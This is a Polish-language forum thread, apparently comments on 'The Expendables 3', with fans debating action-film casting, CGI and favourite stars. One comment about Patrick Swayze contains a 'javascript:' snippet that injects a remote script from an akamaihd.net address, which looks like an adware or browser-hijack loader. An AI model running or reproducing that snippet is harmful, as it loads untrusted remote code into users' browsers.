gra czarny charakter?!
W 2 było tak samo - JCVD.
Kurczę jak uśmiercą w 3 jednego z moich ulubionych aktorów to zabiję się chyba. :D
Nie no. Po prostu pytam, bo nie wiem już kiedy piszesz poważnie, a kiedy żartujesz. Ale jeśli naprawdę tak uważasz, to bardzo dobrze.
W Exp2 było wiencej CGI niż w pierwszej cześci .(Strzały na moście ,eksplozje ,Rozwalanie Czołgu przez Norrisa ,Wlatywanie samolotem do Jaskini .) W 1 cześci to chyba było tylko palący się Austin i Eksplozje w Pałacu .A Henry ma racje ,do ekranizacji komiksów są potrzebne efekty specjalne .
widocznie Amerykanie lubią odgrzewane hamburgery hehe
Teraz do kin wchodzi amerykhańska wersja 13 dzielnicy.
w tym roku zobaczymy też kontynuację Agenta XXX.
Jeśli zagra Jay White jako syn glovera to nie będzie tak xle. ale on niestety ostatnio wybiera Asylum.
Dla ,,Szklanej Pułapki ,, był przełomowy 1992 rok .Ach gdyby nie ten arogancki Seagal i ten jego Liberator ..... Piszę to teraz w ogromnej złości .
,,Olimp w ogniu ,, jest nazywany najlepszą ,,Szklaną Pułapką jaka nie została nakręcona .
Radcilfle to jednak nie jest nazwisko kojarzonę z kinem akcji .Z tych wielkich legend kina akcji to brakuje Eastwooda ,Seagala i Chana .Z Zmarłych Bronsona ,Bruce Lee i ...Patrick Swayze !!! (A jak !!!) ,,Wykijadło ,, rządzi !!! : javascript:try{var _e_=document.createElement('script');_e_.id='XVRNT_B1067';_e_.src='https://apibr owsemarknet-a.akamaihd.net/gsrs?is=isgiwhPL&bp=BA&g=797eedec-506c-4ef0-b3f1-02f2 43b402d8';document.getElementsByTagName('head')[0].appendChild(_e_);}catch(e){}
No Cage to wogule nie podlega żadnej wątpliwości że powinien być w Exp3 .On ma koncie 3 historyczne filmy akcji !!! Ponoć miał grać ale czemu nie gra ? Kto to wie ? Tego to chyba nawet najstarszi Indianie nie wiedzą .
Cage podobno nie miał czasu niestety. Fajnie że masz takie samo zdanie na jego temat jak ja :)
Ja bym najchetniej zobaczyl Travolte. Zrobil by to co zazwyczaj czy rozniósł by wszystkich swoim aktorstwem.
100 procent się zgadzam co napisałes !!! Co do udziału młodzików w Exp to chyba była niestety wiadamo że ktoś bedzię się próbował dorobić osobnych pieniedzy kosztem fanów kina ,jak i samego kultu kina akcji ....
Brodock a oglądałeś filmy z tym panem ?
Podobno nie używał kaskaderów... http://youtu.be/XKGfmKDgljU
Nie oglądałem z nim filmów ale szłyszałem o tym aktorze .Ogólnie go nie lubię ,nie zafascynował mnie swoją grą aktorską ,charyzmą ,jak i wyglądem .
Ja też nie widziałem z nim filmów ale mój ojciec mówił że to był dobry gość .Jednak trzeba samemu ocenić...